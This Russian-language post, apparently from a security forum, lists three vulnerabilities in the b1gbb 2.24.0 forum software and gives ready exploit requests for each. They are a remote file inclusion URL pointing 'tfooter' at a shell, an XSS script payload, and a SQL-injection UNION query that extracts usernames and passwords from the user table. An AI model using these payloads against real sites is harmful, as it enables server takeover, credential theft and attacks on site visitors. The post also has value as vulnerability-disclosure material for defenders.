PHP-Include b1gbb 2.24.0 Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "tfooter" в сценарии footer.inc.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена в конфигурационном файле PHP. Пример: Code: http://[host]/path/footer.inc.php?tfooter=[file] Межсайтовый скриптинг b1gbb 2.24.0 Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему и выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «user» сценарием visitenkarte.php. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Пример: Code: /visitenkarte.php?user=%22%3E%3Cscript%3Ealert(1);%3C/script%3E SQL-инъекция b1gbb 2.24.0 Уязвимость существует из-за недостаточной обработки входных данных в параметре «id» сценарием showthread.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Пример Code: //showthread.php?id=-1%20union%20all%20select%200,1,2,3,4,5,6, concat(username,passwort),8%20FROM%20 cebb_user%20%20where%20id=1/* XSS Code: /visitenkarte.php?user=%22%3E%3Cscript%3Ealert(1);%3C/script%3E Exploite Code: # b1gBB (b1g Bulletion Board) (footer.inc.php) Remote File Inclusion Vulnerabilities # D.Script : http://switch.dl.sourceforge.net/sourceforge/b1gbb/b1gbb-2.24.0.zip # V.Code : include $tfooter # In : footer.inc.php # Exploits : http://www.name/path/footer.inc.php?tfooter=shell? # Discovered by: Rf7awy [email protected]